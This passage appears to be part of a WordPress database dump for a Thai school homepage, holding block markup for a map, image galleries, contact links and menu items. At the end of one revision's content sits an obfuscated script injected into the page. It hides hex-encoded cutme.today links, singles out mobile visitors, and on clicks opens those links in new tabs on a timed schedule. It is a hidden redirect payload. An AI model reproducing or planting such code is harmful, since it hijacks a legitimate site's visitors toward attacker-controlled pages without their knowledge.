href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:26:51','2025-09-11 07:26:51','',14,'http://pakhaeng.ssk.in.th/?p=2030',0,'revision','',0),
(2032,1,'2025-09-11 14:28:00','2025-09-11 07:28:00','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_28b6e3-b1\",\"ids\":[2029],\"type\":\"fluidcarousel\",\"imagesDynamic\":[{\"id\":2029,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2029\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1-1024x410.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1.png\",\"width\":1024,\"height\":410}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 